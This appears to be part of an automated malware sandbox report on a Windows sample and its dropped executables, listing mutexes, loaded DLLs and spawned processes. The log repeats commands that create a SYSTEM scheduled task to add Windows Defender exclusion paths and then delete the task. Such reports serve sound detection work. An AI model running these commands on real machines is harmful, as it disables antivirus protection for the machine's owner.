Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4784:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2548:304:WilStaging_02
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.78.242:8917:Sauron
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5088:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2388:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4784:120:WilError_03
Source: C:\Users\user\Documents\ieiUC1.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2388:304:WilStaging_02
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCommand line argument: tbcore3.dll38_2_000A1000
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCommand line argument: tbcore3.dll38_2_000A1000
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCommand line argument: tbcore3U.dll38_2_000A1000
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCommand line argument: tbcore3U.dll38_2_000A1000
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCommand line argument: tbcore3.dll39_2_000F1000
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCommand line argument: tbcore3.dll39_2_000F1000
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCommand line argument: tbcore3U.dll39_2_000F1000
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCommand line argument: tbcore3U.dll39_2_000F1000
Source: 183643586-388657435.07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Documents\ieiUC1.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 183643586-388657435.07.exeVirustotal: Detection: 9%
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile read: C:\Users\user\Desktop\183643586-388657435.07.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\183643586-388657435.07.exe "C:\Users\user\Desktop\183643586-388657435.07.exe"
Source: unknownProcess created: C:\Users\user\Documents\ieiUC1.exe C:\Users\user\Documents\ieiUC1.exe
Source: unknownProcess created: C:\Users\user\Documents\ieiUC1.exe C:\Users\user\Documents\ieiUC1.exe
Source: unknownProcess created: C:\Users\user\Documents\ieiUC1.exe C:\Users\user\Documents\ieiUC1.exe
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe"
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe "C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe"
Source: unknownProcess created: C:\ProgramData\dTuXOGtw.exe
Source: unknownProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe
Source: unknownProcess created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exe
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess created: C:\Program Files (x86)\DXESuT\DXESuT.exe "C:\Program Files (x86)\DXESuT\DXESuT.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.ini
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: pid.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: hid.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\183643586-388657435.07.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: windows.staterepositorycore.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
